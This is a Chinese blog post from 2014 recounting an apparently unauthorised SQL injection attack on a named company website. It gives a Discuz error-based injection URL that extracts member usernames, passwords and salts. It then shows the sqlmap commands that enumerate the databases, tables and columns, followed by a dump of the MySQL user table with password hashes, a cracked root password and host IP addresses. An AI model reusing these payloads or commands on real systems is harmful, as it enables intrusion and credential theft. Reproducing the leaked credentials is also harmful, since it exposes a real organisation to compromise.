注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

c32's blog

每天学习一点点,每天进步一点点.

 
 
 
 
 

日志

 
 

sqlmap实战之一  

2014-06-12 15:42:49|  分类: ubuntu |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
AWAS发现注入点,果断丢到sqlmap
先跑数据库

http://bbs.roadrover.cn/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29+and+%28select+1+from+%28select+count%28*%29,concat%28%28select+concat%28username,0x3a,password,0x3a,salt%29+from+uc_members+limit+0,1%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23 //7.2爆表语句

sqlmap -u"http://www.roadrover.cn/article_view.asp?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/" --dbs

sqlmap实战 - c32 - c32s blog

available databases [9]:                                                                       
[*] discuz
[*] enweb
[*] esysdata
[*] esysdata_bak
[*] information_schema
[*] mysql
[*] roadrover_enus
[*] roadrover_new
[*] test

找到了9个数据库,我想知道这个数据库分别有哪些帐号有没有外链权限,所以直接跑mysql库下的所有表。

sqlmap -u"http://www.roadrover.cn/article_view.asp?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/" -D mysql --tables

sqlmap实战 - c32 - c32s blog
在mysql找到17个表,其中user表是我想要找的。 开始跑mysql库下user表下的所有字段

sqlmap -u"http://www.roadrover.cn/article_view.asp?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/" -D mysql -T user --columns

sqlmap实战 - c32 - c32s blog
跑出一共37个字段,然后开始跑user,host,password字段下的内容并导出到CSV

sqlmap -u"http://www.roadrover.cn/article_view.asp?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/" -D mysql -T user -C "User,Host,Password" --dump

sqlmap实战 - c32 - c32s blog
Database: mysql
Table: user
[8 entries]
+----------------+--------+-------------------------------------------+
| Host           | User   | Password                                        |
+----------------+--------+-------------------------------------------+
| localhost      | root   | *66454DE90F75F178D847C3B37A88E5013E392AB6 |roadrover2011
| localhost      | lcen   | *6F266ED32D4AEC06F6416A6276DFBAAC557A0072 |未查到
| 127.0.0.1      | root   | *66454DE90F75F178D847C3B37A88E5013E392AB6 |roadrover2011
| localhost      | cnbbs  | *FC9194060F8871EEB6ACC43A81D8AF9A4436934D |未查到
| 183.62.161.139 | root   | *66454DE90F75F178D847C3B37A88E5013E392AB6 |roadrover2011
| 112.95.164.209 | root   | *66454DE90F75F178D847C3B37A88E5013E392AB6 |roadrover2011
| 218.17.160.143 | root   | *66454DE90F75F178D847C3B37A88E5013E392AB6 |roadrover2011
| 210.83.232.226 | root   | *66454DE90F75F178D847C3B37A88E5013E392AB6 |roadrover2011
+----------------+--------+-------------------------------------------+

  评论这张
 
阅读(112)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017